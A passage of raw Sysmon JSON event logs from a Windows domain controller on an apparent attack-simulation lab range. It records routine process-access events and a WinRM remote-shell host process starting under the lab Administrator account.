05:52:13.764","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4296,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4297,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.770\r\nProcessGuid: {A837DB8D-030D-5F25-0000-0010EC520600}\r\nProcessId: 1324\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.770","ProcessGuid":"{A837DB8D-030D-5F25-0000-0010EC520600}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4298,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-0010EC520600}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-0010EC520600}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4299,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-0010EC520600}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-0010EC520600}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4300,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4301,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4302,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4303,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
